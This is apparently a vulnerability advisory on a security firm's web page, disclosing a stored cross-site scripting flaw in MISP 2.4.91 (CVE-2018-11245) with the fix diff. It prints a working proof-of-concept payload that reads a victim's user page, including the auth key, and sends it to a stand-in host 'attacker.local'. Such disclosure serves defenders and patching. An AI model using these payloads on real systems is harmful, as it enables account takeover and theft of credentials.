Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

DATE

18.05.2018

Affected Vendor

CIRCL – Computer Incident Response Center Luxembourg

Affected Product

MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/

Vulnerable version

2.4.91

Fixed version

2.4.92

Recommendations

Update to MISP version 2.4.92 

Vulnerability details

This is very dangerous because every user with permissions to add attributes can attack any other user including administrator exfiltrating for example auth key.
Attack requires victim to visit crafted event and click on the attribute but is very easy to conduct.

PoC

Easiest way to reproduce it:

  1. Create an event
  2. Add an attribute
    Category: External analysis
    Type: cortex
    Distribution: Inherit event
    Value:
    {
      "jsonrpc": "2.0",
      "result": "Faketext<script>alert('XSS');</script>",
      "id": 1
    }
  1. Click on the value of newly created attribute (Cortex object)

Result:
XSS alert

PoC with stealing auth key

Value of the cortex attribute:

{
  "jsonrpc": "2.0",
  "result": "Faketext<script>$.get('/users/view/me',function(d){pos_start = d.indexOf('<h2>User</h2>');pos_end=d.indexOf(decodeURI('%3Cdiv%20class=%22actions%20debugOff%20sideMenu%22%3E'), pos_start);if(pos_start > pos_end) pos_end = pos_start*99;interested = d.substring(pos_start, pos_end);$.get('http://attacker.local/'+escape(interested));});</script>",
  "id": 1
}

Here is a fix:

root@misp:/var/www/MISP/app/webroot/js# diff misp.js misp.js.fix
3163c3163
<       cortex_data = JSON.stringify(cortex_data, null, 2);
---
>       cortex_data = htmlEncode(JSON.stringify(cortex_data, null, 2));

CVE

CVE-2018-11245

Credits

Dawid Czarnecki

Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.

NEED A CONSULTATION?